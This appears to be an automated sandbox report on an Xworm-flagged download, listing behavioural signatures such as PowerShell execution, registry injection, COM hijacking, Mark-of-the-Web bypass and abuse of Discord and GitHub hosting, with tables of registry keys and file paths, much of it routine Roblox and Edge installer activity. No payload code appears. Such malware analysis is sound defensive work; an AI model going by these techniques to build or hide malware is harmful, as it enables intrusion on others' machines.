Analysis Overview
Threat Level: Known bad
The file https://file.io/h5Uhqk3g8uxH was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Event Triggered Execution: Image File Execution Options Injection
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Event Triggered Execution: Component Object Model Hijacking
Legitimate hosting services abused for malware hosting/C2
Mark of the Web detected: This indicates that the page was originally saved or cloned.
Checks installed software on the system
Checks whether UAC is enabled
Checks system information in the registry
Suspicious use of NtCreateThreadExHideFromDebugger
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Subvert Trust Controls: Mark-of-the-Web Bypass
Drops file in Windows directory
System Network Configuration Discovery: Internet Connection Discovery
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
NTFS ADS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-25 22:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-25 22:15
Reported
2024-08-25 22:21
Platform
win11-20240802-en
Max time kernel
359s
Max time network
360s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Mark of the Web detected: This indicates that the page was originally saved or cloned.
| Description | Indicator | Process | Target |
| N/A | https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\AnimationEditor\button_zoom_default_right.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\DeveloperFramework\StudioTheme\clear_hover.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Menu\hamburger3D.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\PurchasePrompt\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\MicLight\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\TerrainTools\mtrl_slate.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Settings\MenuBarAssets\MenuBackground.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\Controls\DesignSystem\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\msedgeupdateres_kok.dll | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Locales\az.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\AssetImport\Import.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\TopBar\chatOff.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\LuaPackages\Packages\_Index\FoundationImages\FoundationImages\SpriteSheets\img_set_1x_1.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\Gamepad\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\LuaApp\graphic\ph-avatar-portrait.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\LuaChat\graphic\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\models\ViewSelector\Basic.mesh | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\StudioSharedUI\KebabMenu.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Controls\PlayStationController\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\New\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\models\Thumbnails\Mannequins\Rthro.rbxm | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Lobby\Buttons\scroll_up.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\msedgeupdateres_tt.dll | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\CompositorDebugger\clip.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\TerrainTools\mt_add.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Controls\DesignSystem\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\collapsibleArrowDown.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\DeveloperFramework\close.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\StudioToolbox\AudioMusic.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\StudioUIEditor\icon_rotate1.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Controls\DesignSystem\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\RoactStudioWidgets\toggle_disable_dark.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\StudioSharedUI\default_group.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\TagEditor\Insert.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Controls\XboxController\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\MicDark\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\MicLight\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\translations\CoreScriptLocalization.csv | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\MaterialGenerator\Materials\Wood.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Settings\ShareGame\icons.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Edge.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Trust Protection Lists\Sigma\Staging | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\AnimationEditor\img_dark_timetag_bg.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\StudioToolbox\AssetConfig\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\SearchIcon.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Menu\buttonBackground.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\SpeakerNew\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Trust Protection Lists\manifest.json | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\LuaApp\icons\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\mojo_core.dll | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Locales\hr.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\AnimationEditor\btn_clearText.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\MaterialGenerator\material_uploaded.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\particles\forcefield_glow_main.dds | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ViewSelector\left.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\Controls\DesignSystem\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\CompositorDebugger\select.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Controls\DefaultController\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ViewSelector\bottom.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Lobby\Buttons\more_nine_slice_button.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Locales\bg.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\128.0.2739.42\Locales\mr.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\psmachine.dll | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe | N/A |
Drops file in Windows directory
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Debug\gay ass executor.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio\WarnOnOpen = "0" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
